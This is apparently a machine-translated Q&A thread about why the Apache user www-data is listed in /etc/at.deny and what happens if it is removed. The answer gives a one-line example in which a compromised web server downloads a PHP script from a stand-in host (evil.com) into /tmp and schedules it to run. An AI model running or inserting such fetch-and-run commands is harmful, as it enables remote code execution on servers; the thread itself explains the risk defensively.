Назад | Перейти на главную страницу

Почему www-data (пользователь Ubuntu / Apache) указан в файле / etc / at.deny?

У меня есть cgi-скрипт, который повторно отправляет электронное письмо при неудачной попытке через 5-10 минут после того, как пользователь открывает страницу. Я думал сделать это с помощью at команда из вызова python (os.system("at now + 5 minutes <<< ' python resend.py data'")). Тестирование выявило:

$ sudo su www-data
$ at now
You do not have permission to use at.
$

Какого рода горе мне грозит, если я удаляю пользовательские www-данные из /etc/at.deny файл?

внося это предлагаемое изменение, вы позволяете пользователю apache запускаться как выполнение заданий в будущем, в более позднее время .... я не знаю, это возможно, но если вы можете подорвать веб-сервер, чтобы выполнить что-то на стороне сервера, например

exec ("cd / tmp && wget http://evil.com/evil.php && позже /tmp/evil.php ")

это будет запускать загруженный скрипт php позже.

это в основном одноразовый cron, и, честно говоря, я обычно отключаю его в пользу jenkins.